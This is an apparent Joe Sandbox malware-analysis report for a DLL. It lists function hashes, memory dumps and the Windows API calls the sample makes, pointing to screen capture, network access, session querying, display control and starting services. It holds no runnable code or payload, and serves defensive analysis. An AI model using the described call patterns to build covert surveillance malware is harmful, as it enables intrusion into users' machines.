                                                  • Opcode ID: 4d1a71cbad2e8490f7bdd0b7b2d5e33d221c358bfa213511aab1859ad13583ec
                                                  • Instruction ID: 5a9ae8d5125f4473acdfdc2c571faec41a6d57683b79152a5b2af942287cdb62
                                                  • Opcode Fuzzy Hash: 4d1a71cbad2e8490f7bdd0b7b2d5e33d221c358bfa213511aab1859ad13583ec
                                                  • Instruction Fuzzy Hash: 0E31A0746447419BE724CF348C06BCABAE1FF49700F000A2DF6AA9B2C1D7B1E684C792
                                                  APIs
                                                  • CreateDIBSection.GDI32(10019096,?,00000000,10019096,00000000,00000000), ref: 100192BE
                                                  • SelectObject.GDI32(?,00000000), ref: 100192CD
                                                  • BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 100192EA
                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001930A
                                                  • DeleteObject.GDI32(?), ref: 10019332
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object$CreateDeleteSectionSelect
                                                  • String ID:
                                                  • API String ID: 3188413882-0
                                                  • Opcode ID: c47ec7ba65a712e0d1f3a3476198e4529758ddf825267e59d987f02d8c4fa404
                                                  • Instruction ID: 171a801546ab23d17400ea9514ceaa77a6b5348b798b605dacd974edddfe344e
                                                  • Opcode Fuzzy Hash: c47ec7ba65a712e0d1f3a3476198e4529758ddf825267e59d987f02d8c4fa404
                                                  • Instruction Fuzzy Hash: C831D2B6200705AFD214DF59CC84E27F7AAFB88600F148A1EFA5987791C771F9008BA0
                                                  APIs
                                                  • #825.MFC42(?,?), ref: 10021631
                                                  • #825.MFC42(?), ref: 1002168E
                                                  • ??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 100216A2
                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 100216C5
                                                  • #825.MFC42(00000000), ref: 100216D0
                                                    • Part of subcall function 10022900: #825.MFC42(?,?,1012C490,?,1002162E,?), ref: 10022922
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #825$Lockit@std@@$??0_??1_
                                                  • String ID:
                                                  • API String ID: 3320149174-0
                                                  • Opcode ID: b95a587d895c0ab44b11dd6e45e27ddbbd99a7c568eb3c3c12ff39da7be81697
                                                  • Instruction ID: 7a8269cd3ee80eb637369a84312dbdf4993a751beb894944a50252e8918c9aaa
                                                  • Opcode Fuzzy Hash: b95a587d895c0ab44b11dd6e45e27ddbbd99a7c568eb3c3c12ff39da7be81697
                                                  • Instruction Fuzzy Hash: 6331AEB96007559FCB10DFA8E8D485EB3E9FB98750B99481DE85A83A00EB34FD04CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InternetOpen
                                                  • String ID: y$y
                                                  • API String ID: 2038078732-2085659379
                                                  • Opcode ID: dc452fb532a8b3440562dfce708e2233d078e41fe58a17104d6ab9b3988a5d1b
                                                  • Instruction ID: b3f128dd8a4f2f937591d2b39a566a4fd65ce5111e4adbe3f1b9da6999f925d3
                                                  • Opcode Fuzzy Hash: dc452fb532a8b3440562dfce708e2233d078e41fe58a17104d6ab9b3988a5d1b
                                                  • Instruction Fuzzy Hash: F0212C796082145BD200DB68BC95AAF77D9EBC4610F440439FD49D7341DBB5EA0982E7
                                                  APIs
                                                  • #6662.MFC42(0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468,00000000,100114A3,00000000,00000000,00000000), ref: 10011A82
                                                  • #4278.MFC42(1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468,00000000,100114A3), ref: 10011A9E
                                                  • #6883.MFC42(?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468), ref: 10011AB2
                                                  • #800.MFC42(?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468), ref: 10011AC3
                                                  • #6662.MFC42(0000005C,00000001,?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798), ref: 10011AD0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #6662$#4278#6883#800
                                                  • String ID:
                                                  • API String ID: 2113711092-0
                                                  • Opcode ID: 774a556c8fd2fdb14a6c748a972ff41b9b256d90f559a08a3d16b273acc7db09
                                                  • Instruction ID: f4fe6630835c94391bfcc8c2be099bdb1318b56aaed041f5013be16c963cdde2
                                                  • Opcode Fuzzy Hash: 774a556c8fd2fdb14a6c748a972ff41b9b256d90f559a08a3d16b273acc7db09
                                                  • Instruction Fuzzy Hash: A611F0363016159BDB18DE29DC45BAEBB95EF846B0F81072CF82A8B2C0DA34EC458691
                                                  APIs
                                                  • SetFilePointer.KERNEL32(?,?,00000001,00000000,?,?,00000065,1000878E,00000001,00000001,?,00000001,00000001,00000001), ref: 1000956E
                                                  • LocalAlloc.KERNEL32(00000040,00019000,?,?,00000065,1000878E), ref: 10009583
                                                  • ReadFile.KERNEL32(?,00000009,00018FF7,?,00000000,?,?,00000065,1000878E), ref: 100095B0
                                                  • LocalFree.KERNEL32(00000000,?,?,00000065,1000878E), ref: 100095CD
                                                  • LocalFree.KERNEL32(00000000,?,?,00000065,1000878E), ref: 100095E7
                                                    • Part of subcall function 10009600: CloseHandle.KERNEL32(?,00000000,100095E2,?,?,00000065,1000878E), ref: 1000960F
                                                    • Part of subcall function 10009600: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,00000001,00000000,100095E2,?,?,00000065,1000878E), ref: 1000963C
                                                    • Part of subcall function 10009600: #825.MFC42(00000001,?,?,00000065,1000878E), ref: 10009643
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$FileFree$#825AllocCloseD@2@@std@@D@std@@HandlePointerReadTidy@?$basic_string@U?$char_traits@V?$allocator@
                                                  • String ID:
                                                  • API String ID: 1358099757-0
                                                  • Opcode ID: 63df56e09b5848d09f2d368d6da1cb594e9dd00ae11557fb136ebf9b1cc4f06e
                                                  • Instruction ID: c1002f4ed646788d97939a754a35c43ee484aff7721c1be338d8eb9f0dbbf468
                                                  • Opcode Fuzzy Hash: 63df56e09b5848d09f2d368d6da1cb594e9dd00ae11557fb136ebf9b1cc4f06e
                                                  • Instruction Fuzzy Hash: 911172B63007029BE310CF69DC84B97B7E9FB88361F148A29F655C7281C730E815CB65
                                                  APIs
                                                    • Part of subcall function 10010B70: LoadLibraryA.KERNEL32(KERNEL32.dll,WaitForSingleObject,?,10016C10,?,?,?,?,?,10098A80,000000FF), ref: 10010B7D
                                                    • Part of subcall function 10010B70: GetProcAddress.KERNEL32(00000000), ref: 10010B84
                                                    • Part of subcall function 10010B70: Sleep.KERNEL32(00000096,?,?,?,?,?,10098A80,000000FF), ref: 10010B97
                                                    • Part of subcall function 10016FB0: GetDeviceCaps.GDI32(?,00000076), ref: 10016FE0
                                                    • Part of subcall function 10016FB0: GetDeviceCaps.GDI32(?,00000075), ref: 10016FF3
                                                  • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 10016CA5
                                                  • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 10016CB8
                                                  • Sleep.KERNEL32(000000C8), ref: 10016CF5
                                                    • Part of subcall function 10016640: InterlockedExchange.KERNEL32(?,00000000), ref: 1001666A
                                                    • Part of subcall function 10016640: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,10098A71,000000FF), ref: 10016675
                                                    • Part of subcall function 10016640: CloseHandle.KERNEL32(?,?,?,?,?,?,10098A71,000000FF), ref: 10016682
                                                    • Part of subcall function 10016640: #823.MFC42(000001F0), ref: 100166B0
                                                    • Part of subcall function 10016640: InterlockedExchange.KERNEL32(?,00000001), ref: 1001676D
                                                  • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 10016CD4
                                                  • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 10016CE7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CapsDeviceExchangeInfoInterlockedMessageParametersSendSleepSystem$#823AddressCloseHandleLibraryLoadObjectProcSingleWait
                                                  • String ID:
                                                  • API String ID: 2254935227-0
                                                  • Opcode ID: be34e79cd9df595e1d2b8075480f17057713f7290116f38b1c8fc94b4d2aef5d
                                                  • Instruction ID: e30af70989239995af6de31e114a37a8b410705a01b45ccca30f7429a886076e
                                                  • Opcode Fuzzy Hash: be34e79cd9df595e1d2b8075480f17057713f7290116f38b1c8fc94b4d2aef5d
                                                  • Instruction Fuzzy Hash: 6911E13438431969E960EB244C42FBA7786DF49B60F200139BB49AF2D3C9F0F8849568
                                                  APIs
                                                  • #823.MFC42(00000018,?,?,?,?,100215C5,100215A5,?,?,100215A5), ref: 1002245E
                                                  • ??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,100215A5), ref: 10022478
                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,100215A5), ref: 100224AA
                                                  • #825.MFC42(00000000,?,?,?,?,?,100215A5), ref: 100224B5
                                                  • #823.MFC42(00000018,?,?,?,?,?,100215A5), ref: 100224C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823Lockit@std@@$#825??0_??1_
                                                  • String ID:
                                                  • API String ID: 2469163743-0
                                                  • Opcode ID: bb3b065350712678b62f89fc3cbe3aba2e79eed46fc4f618aef98a5c362d99f9
                                                  • Instruction ID: 9688acf8f76454a61f02f4685eabb48151241351a0c66602ac795b9270a01d11
                                                  • Opcode Fuzzy Hash: bb3b065350712678b62f89fc3cbe3aba2e79eed46fc4f618aef98a5c362d99f9
                                                  • Instruction Fuzzy Hash: 5A119DB1604345AFC300DF99E8C0956FBE4FF58310B55806EE18987B22D774B945CBD1
                                                  APIs
                                                  • WTSQuerySessionInformationW.WTSAPI32 ref: 10024AB4
                                                  • lstrcpyW.KERNEL32(?,00000000,00000000), ref: 10024AD4
                                                  • WTSFreeMemory.WTSAPI32(?), ref: 10024ADF
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000200,?,000000FF,00000000,00000104,00000000,00000000,?), ref: 10024B18
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 10024B2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ByteCharFreeInformationMemoryMultiQuerySessionWide
                                                  • String ID:
                                                  • API String ID: 2394411120-0
                                                  • Opcode ID: 1b9fc8bdf879ab64dffc80c6641e543ed05e3d8dc88176b00b51a123d4ec99f8
                                                  • Instruction ID: 955f71c2f156101e58c3954c60e55afc292817027518ed639cbb0e0337d6e5ae
                                                  • Opcode Fuzzy Hash: 1b9fc8bdf879ab64dffc80c6641e543ed05e3d8dc88176b00b51a123d4ec99f8
                                                  • Instruction Fuzzy Hash: C61165751183417BE310CB58CC45FEB73E8BBC8B10F044A1CF659962C0E674A5088B62
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: fgets$fclosefopenstrncpy
                                                  • String ID:
                                                  • API String ID: 2591305919-0
                                                  • Opcode ID: c37e7c1d6514c87696892a977815a2dda57362a8b53131c72b83328125353122
                                                  • Instruction ID: 71aea0b9be3d2363716b79664c12e5d484ebc15182e3c964ac9ce2589b14527c
                                                  • Opcode Fuzzy Hash: c37e7c1d6514c87696892a977815a2dda57362a8b53131c72b83328125353122
                                                  • Instruction Fuzzy Hash: 0501DF726002296BE301D738EDC1BDB37DCEF84715F950424FD9896250EB79DA8486A2
                                                  APIs
                                                  • #858.MFC42(-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119AB
                                                  • #6874.MFC42(0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119B4
                                                  • #6874.MFC42(0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119C5
                                                  • #6874.MFC42(00000020,0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119D6
                                                  • #800.MFC42(00000020,0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #6874$#800#858
                                                  • String ID:
                                                  • API String ID: 833685189-0
                                                  • Opcode ID: 8fba9978fbcacef4305ec62f9d20de837d23ef3cff7f8932171e12680254217a
                                                  • Instruction ID: 01b43e94da0ea2eb4e39674b02d587f3c921b09ce4ba7a4e708dea5c2d38b77a
                                                  • Opcode Fuzzy Hash: 8fba9978fbcacef4305ec62f9d20de837d23ef3cff7f8932171e12680254217a
                                                  • Instruction Fuzzy Hash: A401F471208B82AAC704CF54EA15F9AFBD5EB90B60F00063EF0A5476D1DB74E9088392
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001,00000000,1001FB22,1011EC82,?,?,?,?,?,?,?,?), ref: 1001FEE7
                                                  • OpenServiceA.ADVAPI32(00000000,?,00020000,?,?,?,?,?,?,?,?), ref: 1001FF00
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 1001FF0B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenService$CloseHandleManager
                                                  • String ID:
                                                  • API String ID: 4136619037-0
                                                  • Opcode ID: 9b0dc5b076fce1cf9a16b774a2a7847931855da1db67cd2e176fee473d4c4fbc
                                                  • Instruction ID: efb21d9ce1343172679c2ebe97ca72b077adbb798532605da40d3010ccc8a93c
                                                  • Opcode Fuzzy Hash: 9b0dc5b076fce1cf9a16b774a2a7847931855da1db67cd2e176fee473d4c4fbc
                                                  • Instruction Fuzzy Hash: 30E09236219231A7E2217729BC88FDB67A8EFD9791F0B0156F608DA190C6A0D88245E8
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,?,10028552), ref: 10027267
                                                  • OpenServiceA.ADVAPI32(00000000,?,00010010,?,00000065), ref: 10027280
                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,00000065), ref: 10027297
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000065), ref: 1002729E
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000065), ref: 100272A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandleOpen$ManagerStart
                                                  • String ID:
                                                  • API String ID: 1485051382-0
